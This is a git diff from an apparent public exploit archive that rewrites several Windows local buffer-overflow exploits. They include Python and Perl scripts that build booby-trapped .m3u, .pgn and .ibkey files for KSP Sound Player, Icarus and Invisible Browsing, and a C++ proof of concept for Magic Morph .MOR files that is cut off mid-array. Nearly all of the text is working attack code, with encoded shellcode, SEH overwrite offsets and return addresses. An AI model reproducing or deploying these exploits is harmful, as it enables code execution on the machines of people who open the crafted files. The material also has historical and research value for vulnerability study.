+++ b/platforms/windows/local/9624.py
@@ -1,51 +1,51 @@
-##!/usr/bin/python
-# Found By :: HACK4LOVE
-# hack4love@hotmail.com
-# KSP 2009R2 (m3u) Universal Local Buffer Exploit (SEH)
-# http://ksplayer.boo.pl/index.php
-# #--->> info:: KSP 2009R2 Sound Player was released 28//8//2009
-# AND special THANKS FOR His0k4#
-######################################################################
-shellcode=(
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"
-"\x42\x30\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x58\x4e\x47"
-"\x45\x50\x4a\x37\x41\x50\x4f\x4e\x4b\x58\x4f\x34\x4a\x41\x4b\x58"
-"\x4f\x55\x42\x52\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48"
-"\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"
-"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
-"\x46\x4f\x4b\x33\x46\x55\x46\x52\x46\x50\x45\x47\x45\x4e\x4b\x48"
-"\x4f\x55\x46\x52\x41\x30\x4b\x4e\x48\x56\x4b\x48\x4e\x30\x4b\x34"
-"\x4b\x48\x4f\x35\x4e\x51\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x58"
-"\x41\x50\x4b\x4e\x49\x48\x4e\x55\x46\x42\x46\x50\x43\x4c\x41\x43"
-"\x42\x4c\x46\x36\x4b\x38\x42\x54\x42\x33\x45\x38\x42\x4c\x4a\x47"
-"\x4e\x30\x4b\x48\x42\x34\x4e\x50\x4b\x58\x42\x57\x4e\x51\x4d\x4a"
-"\x4b\x48\x4a\x36\x4a\x50\x4b\x4e\x49\x50\x4b\x48\x42\x38\x42\x4b"
-"\x42\x30\x42\x50\x42\x30\x4b\x58\x4a\x56\x4e\x43\x4f\x35\x41\x33"
-"\x48\x4f\x42\x46\x48\x55\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57"
-"\x42\x45\x4a\x46\x42\x4f\x4c\x58\x46\x30\x4f\x35\x4a\x46\x4a\x59"
-"\x50\x4f\x4c\x58\x50\x50\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x56"
-"\x4e\x36\x43\x56\x42\x30\x5a")
-#########################################################################
-buffer = shellcode
-buffer += "\x41"*(2869-len(shellcode))
-buffer += "\xE8\xC6\xF4\xFF\xFF"
-buffer += "\x90"*10
-buffer += "\xEB\xEF\x90\x90"
-buffer += "\x88\x57\x40"
-
-print buffer
-#########################################################################
-try:
-out_file = open("hack4love.m3u",'w')
-out_file.write(buffer)
-out_file.close()
-raw_input("\nExploit file created!\n")
-except:
-print "Error"
-########################################################################
-
-# milw0rm.com [2009-09-10]
+##!/usr/bin/python
+# Found By :: HACK4LOVE
+# hack4love@hotmail.com
+# KSP 2009R2 (m3u) Universal Local Buffer Exploit (SEH)
+# http://ksplayer.boo.pl/index.php
+# #--->> info:: KSP 2009R2 Sound Player was released 28//8//2009
+# AND special THANKS FOR His0k4#
+######################################################################
+shellcode=(
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"
+"\x42\x30\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x58\x4e\x47"
+"\x45\x50\x4a\x37\x41\x50\x4f\x4e\x4b\x58\x4f\x34\x4a\x41\x4b\x58"
+"\x4f\x55\x42\x52\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48"
+"\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"
+"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
+"\x46\x4f\x4b\x33\x46\x55\x46\x52\x46\x50\x45\x47\x45\x4e\x4b\x48"
+"\x4f\x55\x46\x52\x41\x30\x4b\x4e\x48\x56\x4b\x48\x4e\x30\x4b\x34"
+"\x4b\x48\x4f\x35\x4e\x51\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x58"
+"\x41\x50\x4b\x4e\x49\x48\x4e\x55\x46\x42\x46\x50\x43\x4c\x41\x43"
+"\x42\x4c\x46\x36\x4b\x38\x42\x54\x42\x33\x45\x38\x42\x4c\x4a\x47"
+"\x4e\x30\x4b\x48\x42\x34\x4e\x50\x4b\x58\x42\x57\x4e\x51\x4d\x4a"
+"\x4b\x48\x4a\x36\x4a\x50\x4b\x4e\x49\x50\x4b\x48\x42\x38\x42\x4b"
+"\x42\x30\x42\x50\x42\x30\x4b\x58\x4a\x56\x4e\x43\x4f\x35\x41\x33"
+"\x48\x4f\x42\x46\x48\x55\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57"
+"\x42\x45\x4a\x46\x42\x4f\x4c\x58\x46\x30\x4f\x35\x4a\x46\x4a\x59"
+"\x50\x4f\x4c\x58\x50\x50\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x56"
+"\x4e\x36\x43\x56\x42\x30\x5a")
+#########################################################################
+buffer = shellcode
+buffer += "\x41"*(2869-len(shellcode))
+buffer += "\xE8\xC6\xF4\xFF\xFF"
+buffer += "\x90"*10
+buffer += "\xEB\xEF\x90\x90"
+buffer += "\x88\x57\x40"
+
+print buffer
+#########################################################################
+try:
+out_file = open("hack4love.m3u",'w')
+out_file.write(buffer)
+out_file.close()
+raw_input("\nExploit file created!\n")
+except:
+print "Error"
+########################################################################
+
+# milw0rm.com [2009-09-10]
diff --git a/platforms/windows/local/9628.pl b/platforms/windows/local/9628.pl
index bf60a6b72..b2563ccd6 100755
--- a/platforms/windows/local/9628.pl
+++ b/platforms/windows/local/9628.pl
@@ -1,42 +1,42 @@
-#!/user/bin/perl
-#Icarus 2.0 (.PGn File)Universal Local BOF (SEH)
-#tested on win SP2
-#origenal  exploit : http://milw0rm.com/exploits/8236
-#Author: germaya_x & D3v!LFUCK3R
-#Download :http://www.randomsoftware.com/pub/icarus.exe
-#GreTz [2] :his0k4  , Eddy_BAck0o , THE INJECTOR ,   ALL : www.lezr.com members :)
-#fuck To: RoMaNcYxHaCkEr & alnjm33 & ALL www.sec-war.com  :)
-#############################################################
-my $bof="A" x 332 ;
-my $NEXT_sEh="\xEB\x06\x90\x90";
-my $SEH="\x3F\xB2\x2E\x66";#hnetcfg.DLL
-my $nop="\x90" x 20;
-my $sec=
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
-"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
-"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
-"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
-"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
-"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
-"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
-"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
-"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
-"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
-"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
-"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
-"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
-"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
-"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
-"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
-"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
-"\x4e\x56\x43\x46\x42\x30\x5a";
-###################################################################
-open(myfile,'>> germaya_x.pgn');
-print myfile $bof.$NEXT_sEh.$SEH.$nop.$sec;
-###################################################################
-
-# milw0rm.com [2009-09-10]
+#!/user/bin/perl
+#Icarus 2.0 (.PGn File)Universal Local BOF (SEH)
+#tested on win SP2
+#origenal  exploit : http://milw0rm.com/exploits/8236
+#Author: germaya_x & D3v!LFUCK3R
+#Download :http://www.randomsoftware.com/pub/icarus.exe
+#GreTz [2] :his0k4  , Eddy_BAck0o , THE INJECTOR ,   ALL : www.lezr.com members :)
+#fuck To: RoMaNcYxHaCkEr & alnjm33 & ALL www.sec-war.com  :)
+#############################################################
+my $bof="A" x 332 ;
+my $NEXT_sEh="\xEB\x06\x90\x90";
+my $SEH="\x3F\xB2\x2E\x66";#hnetcfg.DLL
+my $nop="\x90" x 20;
+my $sec=
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
+"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
+"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
+"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
+"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
+"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
+"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
+"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
+"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
+"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
+"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
+"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
+"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
+"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
+"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
+"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
+"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
+"\x4e\x56\x43\x46\x42\x30\x5a";
+###################################################################
+open(myfile,'>> germaya_x.pgn');
+print myfile $bof.$NEXT_sEh.$SEH.$nop.$sec;
+###################################################################
+
+# milw0rm.com [2009-09-10]
diff --git a/platforms/windows/local/963.c b/platforms/windows/local/963.c
index c8b701bed..0984b7c56 100755
--- a/platforms/windows/local/963.c
+++ b/platforms/windows/local/963.c
@@ -146,6 +146,6 @@ int main()
 	printf("Phone Number : %s\n",PhoneNumber);
 
 	return 0;
-}
-
-// milw0rm.com [2005-04-28]
+}
+
+// milw0rm.com [2005-04-28]
diff --git a/platforms/windows/local/964.c b/platforms/windows/local/964.c
index 708c59a82..9b6db0554 100755
--- a/platforms/windows/local/964.c
+++ b/platforms/windows/local/964.c
@@ -70,6 +70,6 @@ found!");
 		}
 		else printf("FilePocket is not installed on your system!\n");
 		return 0;
-}
-
-// milw0rm.com [2005-04-28]
+}
+
+// milw0rm.com [2005-04-28]
diff --git a/platforms/windows/local/965.c b/platforms/windows/local/965.c
index 5a50228ae..078dbe3f9 100755
--- a/platforms/windows/local/965.c
+++ b/platforms/windows/local/965.c
@@ -139,6 +139,6 @@ int main()
        */
 
        return 0;
-}
-
-// milw0rm.com [2005-04-28]
+}
+
+// milw0rm.com [2005-04-28]
diff --git a/platforms/windows/local/9655.pl b/platforms/windows/local/9655.pl
index c7f1e8441..f4fbab44e 100755
--- a/platforms/windows/local/9655.pl
+++ b/platforms/windows/local/9655.pl
@@ -1,40 +1,40 @@
-#!/usr/bin/perl
-
-print qq(
-  ############################################################
-  ##                Iranian Pentesters Home                 ##
-  ##                   Www.Pentesters.Ir                    ##
-  ##                  PLATEN -[ H.jafari ]-                 ## 
-  ## Invisible Browsing 5.0.52 (.ibkey) Local BoF Exploit   ##
-  ## bug found & exploited by:  PLATEN                      ##
-  ## E-mail && blog:                                        ##
-  ## hjafari.blogspot.com                                   ##
-  ## platen.secure[at]gmail[dot]com                         ## 
-  ## Greetings: Cru3l.b0y, b3hz4d, Cdef3nder                ##
-  ## and all members in Pentesters.ir                       ##
-  ############################################################
-);
-# Note: I just test this version
-$junk  ="\x41"x 5000;
-$ret   = "\x93\x43\x92\x7c";
-$nop   = "\x90" x 50;
-# win32_exec - Size=160
-#EXITFUNC=seh CMD=calc  
-#Encoder=PexFnstenvSub http://metasploit.com
-$shellcode =
-"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x38".
-"\x78\x73\x8a\x83\xeb\xfc\xe2\xf4\xc4\x90\x37\x8a\x38\x78\xf8\xcf".
-"\x04\xf3\x0f\x8f\x40\x79\x9c\x01\x77\x60\xf8\xd5\x18\x79\x98\xc3".
-"\xb3\x4c\xf8\x8b\xd6\x49\xb3\x13\x94\xfc\xb3\xfe\x3f\xb9\xb9\x87".
-"\x39\xba\x98\x7e\x03\x2c\x57\x8e\x4d\x9d\xf8\xd5\x1c\x79\x98\xec".
-"\xb3\x74\x38\x01\x67\x64\x72\x61\xb3\x64\xf8\x8b\xd3\xf1\x2f\xae".
-"\x3c\xbb\x42\x4a\x5c\xf3\x33\xba\xbd\xb8\x0b\x86\xb3\x38\x7f\x01".
-"\x48\x64\xde\x01\x50\x70\x98\x83\xb3\xf8\xc3\x8a\x38\x78\xf8\xe2".
-"\x04\x27\x42\x7c\x58\x2e\xfa\x72\xbb\xb8\x08\xda\x50\x88\xf9\x8e".
-"\x67\x10\xeb\x74\xb2\x76\x24\x75\xdf\x1b\x12\xe6\x5b\x78\x73\x8a";
-open(fhandle,'>>expl.ibkey');
-print fhandle $junk.$ret.$nop.$shellcode;
-close(fhandle);
-print "\n  [+] File created successfully: expl.ibkey \n";
-
-# milw0rm.com [2009-09-14]
+#!/usr/bin/perl
+
+print qq(
+  ############################################################
+  ##                Iranian Pentesters Home                 ##
+  ##                   Www.Pentesters.Ir                    ##
+  ##                  PLATEN -[ H.jafari ]-                 ## 
+  ## Invisible Browsing 5.0.52 (.ibkey) Local BoF Exploit   ##
+  ## bug found & exploited by:  PLATEN                      ##
+  ## E-mail && blog:                                        ##
+  ## hjafari.blogspot.com                                   ##
+  ## platen.secure[at]gmail[dot]com                         ## 
+  ## Greetings: Cru3l.b0y, b3hz4d, Cdef3nder                ##
+  ## and all members in Pentesters.ir                       ##
+  ############################################################
+);
+# Note: I just test this version
+$junk  ="\x41"x 5000;
+$ret   = "\x93\x43\x92\x7c";
+$nop   = "\x90" x 50;
+# win32_exec - Size=160
+#EXITFUNC=seh CMD=calc  
+#Encoder=PexFnstenvSub http://metasploit.com
+$shellcode =
+"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x38".
+"\x78\x73\x8a\x83\xeb\xfc\xe2\xf4\xc4\x90\x37\x8a\x38\x78\xf8\xcf".
+"\x04\xf3\x0f\x8f\x40\x79\x9c\x01\x77\x60\xf8\xd5\x18\x79\x98\xc3".
+"\xb3\x4c\xf8\x8b\xd6\x49\xb3\x13\x94\xfc\xb3\xfe\x3f\xb9\xb9\x87".
+"\x39\xba\x98\x7e\x03\x2c\x57\x8e\x4d\x9d\xf8\xd5\x1c\x79\x98\xec".
+"\xb3\x74\x38\x01\x67\x64\x72\x61\xb3\x64\xf8\x8b\xd3\xf1\x2f\xae".
+"\x3c\xbb\x42\x4a\x5c\xf3\x33\xba\xbd\xb8\x0b\x86\xb3\x38\x7f\x01".
+"\x48\x64\xde\x01\x50\x70\x98\x83\xb3\xf8\xc3\x8a\x38\x78\xf8\xe2".
+"\x04\x27\x42\x7c\x58\x2e\xfa\x72\xbb\xb8\x08\xda\x50\x88\xf9\x8e".
+"\x67\x10\xeb\x74\xb2\x76\x24\x75\xdf\x1b\x12\xe6\x5b\x78\x73\x8a";
+open(fhandle,'>>expl.ibkey');
+print fhandle $junk.$ret.$nop.$shellcode;
+close(fhandle);
+print "\n  [+] File created successfully: expl.ibkey \n";
+
+# milw0rm.com [2009-09-14]
diff --git a/platforms/windows/local/9659.cpp b/platforms/windows/local/9659.cpp
index bc79619ca..e3914e50d 100755
--- a/platforms/windows/local/9659.cpp
+++ b/platforms/windows/local/9659.cpp
@@ -1,350 +1,350 @@
-   /*********************************************************************
-    Portable E.M Magic Morph 1.95b .MOR File Stack Buffer Overflow POC  *
-    By fl0 fl0w                                                         *
-    "can't stop me/my time is now/your time is up/MY TIME IS NOW !!!!"  *                               
-   **********************************************************************             
-   
-
-  /********************************************************************************************************
-   The EIP offset is at 312 bytes 0x138 HEX                                                               *  
-   After you compile and create the .MOR file ,edit it with HEX EDITOR and start counting from the start  *   
-   of the file, and you'll have to rezult with 0x138 bytes                                                *
-                                                                                                          *
-   I used a technique names "stack spray" to determine the offset.                                        *
-                                                                                                          * 
-   CPU REGISTERS                                                                                          *  
-   EAX 00000000                                                                                           *
-   ECX 33333333                                                                                           *
-   EDX 01492288                                                                                           *
-   EBX 00000001                                                                                           *
-                                                                                                          *
-   ESP 0012EF7C ASCII "444bbbbbbbbbbbgggggggggggggggggbaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa   *
-   ````````````````````````````````````````````````YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY       *
-   XXXXXXXXXXXXXXXXcccccccccccccccccccccccccccccccc2222222223                                             *
-   EBP 0012F3CC ASCII "````````````````````````````````````````````````YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY   *
-   YYYYYYYYYYYYYYYYXXXXXXXXXXXXXXXXcccccccccccccccccccccccccccccccc2222222223333333333fffffAAAAww44444b   *
-   bbbbbbbbbbgggggggggggggggggbaaaaaaaaaaaaaaaaaaaaaaaaaa                                                 *
-                                                                                                          * 
-   ESI 00F369B0                                                                                           *
-   EDI 00F369B0                                                                                           *
-   EIP 41414141                                                                                           *
-                                                                                                          * 
-   We control ECX, EIP witch is more than enought to copy what addresess you want in the memory.          *
-   So I go in OLLYDBG at the ESP register and right click ->follow in stack ,I observe that the corruption*
-   starts at a much lower address.                                                                        *
-   This is what ESP points to:                                                                            *
-   ******************************************************************************************************** 
-  */ 
-   
-   /************************
-     STACK                 * 
-     0012EF7C   62343434   *                                                                               
-     0012EF80   62626262   *
-     0012EF84   62626262   *
-     0012EF88   67676262   *
-     0012EF8C   67676767   *
-     0012EF90   67676767   *
-     0012EF94   67676767   *
-     0012EF98   62676767   *
-     0012EF9C   61616161   *
-     0012EFA0   61616161   *
-     0012EFA4   61616161   *
-     0012EFA8   61616161   *
-     0012EFAC   61616161   *
-     0012EFB0   61616161   * 
-     0012EFB4   61616161   * 
-     0012EFB8   61616161   *
-     0012EFBC   61616161   *
-     0012EFC0   61616161   *
-     0012EFC4   61616161   *
-     0012EFC8   61616161   *
-     0012EFCC   60606060   *
-     0012EFD0   60606060   *
-     0012EFD4   60606060   *
-     0012EFD8   60606060   *
-     0012EFDC   60606060   *
-     0012EFE0   60606060   *
-     0012EFE4   60606060   *
-     0012EFE8   60606060   *  
-     0012EFF0   60606060   *
-     0012EFF4   60606060   *
-     0012EFF8   60606060   *
-     0012EFFC   59595959   *
-     0012F000   59595959   *
-     0012F004   59595959   *
-     0012F008   59595959   *
-     0012F00C   59595959   *
-     ..................... *
-     ***********************
-*/
-
-
-/*************************************************
-You can copy your shellcode starting from here : *
-    0012EC3C   63636363                          *
-                                                 * 
- 0x12EF80 = 1240960 ->NOT-> A                    * 
-                                                 * 
- 0x12EC3C = 1240124 ->NOT-> B                    * 
-                                                 *
- A > B                                           * 
- A - B = 836 = 0x344                             *  
- So the stack gets corrupted a long way from ESP.*
- *************************************************
- */
- 
- 
-
-  /************************************************* 
-   LOOK OF THE DUMP                                * 
-   0012EE4C              63 63 63 63      cccc     *
-   0012EE54  63 63 63 63 63 63 63 63  cccccccc     *
-   0012EE5C  32 32 32 32 32 32 32 32  22222222     *
-   0012EE64  32 33 33 33 33 33 33 33  23333333     *
-   0012EE6C  33 33 33 66 66 66 66 66  333fffff     *
-   0012EE74  41 41 41 41 77 77 34 34  AAAAww44     *
-   0012EE7C  34 34 34 62 62 62 62 62  444bbbbb     *
-   0012EE84  62 62 62 62 62 62 67 67  bbbbbbgg     *
-   0012EE8C  67 67 67 67 67 67 67 67  gggggggg     *
-   0012EE94  67 67 67 67 67 67 67 62  gggggggb     *
-   0012EE9C  61 61 61 61 61 61 61 61  aaaaaaaa     *
-   0012EEA4  61 61 61 61 61 61 61 61  aaaaaaaa     *
-   0012EEAC  61 61 61 61 61 61 61 61  aaaaaaaa     *
-   0012EEB4  61 61 61 61 61 61 61 61  aaaaaaaa     *
-   0012EEBC  61 61 61 61 61 61 61 61  aaaaaaaa     *
-   0012EEC4  61 61 61 61 61 61 61 61  aaaaaaaa     *
-   0012EECC  60 60 60 60 60 60 60 60  ````````     *
-   0012EED4  60 60 60 60 60 60 60 60  ````````     *
-   0012EEDC  60 60 60 60 60 60 60 60  ````````     *
-   0012EEE4  60 60 60 60 60 60 60 60  ````````     *
-   0012EEEC  60 60 60 60 60 60 60 60  ````````     *
-   0012EEF4  60 60 60 60 60 60 60 60  ````````     *
-   0012EEFC  59 59 59 59 59 59 59 59  YYYYYYYY     *
-   0012EF04  59 59 59 59 59 59 59 59  YYYYYYYY     *
-   0012EF0C  59 59 59 59 59 59 59 59  YYYYYYYY     *
-   0012EF14  59 59 59 59 59 59 59 59  YYYYYYYY     *
-   0012EF1C  59 59 59 59 59 59 59 59  YYYYYYYY     *
-   0012EF24  59 59 59 59 59 59 59 59  YYYYYYYY     *
-   0012EF2C  58 58 58 58 58 58 58 58  XXXXXXXX     *
-   0012EF34  58 58 58 58 58 58 58 58  XXXXXXXX     *
-   0012EF3C  63 63 63 63 63 63 63 63  cccccccc     *
-   0012EF44  63 63 63 63 63 63 63 63  cccccccc     *
-   0012EF4C  63 63 63 63 63 63 63 63  cccccccc     *
-   0012EF54  63 63 63 63 63 63 63 63  cccccccc     *
-   0012EF5C  32 32 32 32 32 32 32 32  22222222     *
-   0012EF64  32 33 33 33 33 33 33 33  23333333     *
-   0012EF6C  33 33 33 66 66 66 66 66  333fffff     *
-   0012EF74  41 41 41 41 77 77 34 34  AAAAww44     *
-   0012EF7C  34 34 34 62 62 62 62 62  444bbbbb     *
-   0012EF84  62 62 62 62 62 62 67 67  bbbbbbgg     *
-   0012EF8C  67 67 67 67 67 67 67 67  gggggggg     *
-   0012EF94  67 67 67 67 67 67 67 62  gggggggb     *
-   0012EF9C  61 61 61 61 61 61 61 61  aaaaaaaa     *
-   0012EFA4  61 61 61 61 61 61 61 61  aaaaaaaa     *
-   0012EFAC  61 61 61 61 61 61 61 61  aaaaaaaa     *
-   0012EFB4  61 61 61 61 61 61 61 61  aaaaaaaa     *
-   0012EFBC  61 61 61 61 61 61 61 61  aaaaaaaa     *
-   0012EFC4  61 61 61 61 61 61 61 61  aaaaaaaa     *
-   0012EFCC  60 60 60 60 60 60 60 60  ````````     *
-   0012EFD4  60 60 60 60 60 60 60 60  ````````     *
-   0012EFDC  60 60 60 60 60 60 60 60  ````````     *
-   0012EFE4  60 60 60 60 60 60 60 60  ````````     *
-   0012EFEC  60 60 60 60 60 60 60 60  ````````     *
-   0012EFF4  60 60 60 60 60 60 60 60  ````````     *
-   0012EFFC  59 59 59 59 59 59 59 59  YYYYYYYY     *
-   0012F004  59 59 59 59 59 59 59 59  YYYYYYYY     *
-   0012F00C  59 59 59 59 59 59 59 59  YYYYYYYY     *
-  *************************************************
-  */ 
-  
-  /**************************************************************************************
-    Hello to all my buddies from insecurity.ro ,skullbox.info ,renslt.org               * 
-    Special greetz to OSHO,!_30,str0ke,Carcabot.                                                 *  
-    Vizite my website for more bugs ,papers, exploits, pocs and programming techniques. *
-    http://www.sploitz.10001mb.com                                                      *
-  *************************************************************************************
-  */
-  
-  /*************************************************************************
-  DEMO                                                                     *            
-  C:\Documents and Settings\Stefan\Desktop\magic moth poc>mm.exe           *
-  *********************************************************************    *
-                Magic Morph .MOR File Stack Buffer Overflow POC            * 
-  The usage is:                                                            *  
-                All Credits fl0 fl0w                                       *   
-                                                                           *    
-        -f       FILE.mor                                                  *     
-  ************************************************************************** 
-                                                                           *      
-  C:\Documents and Settings\Stefan\Desktop\magic moth poc>mm.exe -f TEST   *
-  File DONE !                                                              *
-  **************************************************************************
-  */
-  
-  /*****************************************************************************************
-  Technicall details                                                                       * 
-  This program was compiled with DEV-Cpp and tested with success on MS Windows Xp Sp3      *
-  You can download the POC allong with debugging details from my website                   *
-  
-  Preview ...                                                                              * 
-  ......                                                                                   *  
-  This folder contains two screenshots from the ollydbg debbugging session, the poc(MM.CPP)* 
-  and the software Portable E.M Magic Morph 1.95b.                                                                        *   
-  ALL CREDITS GO TO fl0 fl0w for this exploit !                                            *
-  http://www.sploitz.10001mb.com/                                                          * 
-   ...........................                                                             *  
-  ******************************************************************************************   
-  */
-  //START Algorithm
- #include "stdio.h"
- #include "string.h"
- #include "stdlib.h"
- #include "windows.h"
- #include "stdint.h"
- #include "getopt.h"
- typedef struct flo {
- uint8_t a;
- uint8_t b;
- uint8_t c;
-         }F;
-         
-  
-
- void buildFile(char *fname)
- { 
-   uint8_t hexfileP1[] =
-{
-    0x44, 0x6F, 0x63, 0x75, 0x6D, 0x65, 0x6E, 0x74, 0x73, 0x20, 0x61, 0x6E, 0x64, 
-    0x20, 0x53, 0x65, 0x74, 0x74, 0x69, 0x6E, 0x67, 0x73, 0x5C, 0x53, 0x74, 0x65, 0x66, 0x61, 0x6E, 
-    0x5C, 0x4D, 0x79, 0x20, 0x44, 0x6F, 0x63, 0x75, 0x6D, 0x65, 0x6E, 0x74, 0x73, 0x5C, 0x4D, 0x73, 
-    0x20, 0x73, 0x75, 0x70, 0x72, 0x65, 0x6D, 0x63, 0x79, 0x30, 0x30, 0x30, 0x2E, 0x6A, 0x70, 0x67, 
-    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
-    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
-    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
-    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
-    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
